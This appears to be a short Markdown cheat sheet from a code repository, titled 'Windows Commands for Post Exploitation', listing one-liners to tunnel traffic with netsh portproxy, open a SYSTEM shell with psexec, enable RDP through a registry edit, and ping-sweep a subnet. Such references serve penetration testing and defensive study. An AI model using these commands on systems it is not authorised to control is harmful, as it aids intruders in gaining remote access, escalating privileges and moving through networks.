2013-12-20 16:09:59 -05:00

23 lines
511 B
Markdown

# Windows Commands for Post Exploitation
One liners
-----------
**Tunnel traffic natively with windows**
```bash
netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80
```
**Launch cmd.exe as local system w/ psexec**
```bash
psexec -s cmd.exe
```
**Enable rdp with CLI**
```bash
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```
**Launch ARP scan**
```bash
for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i
```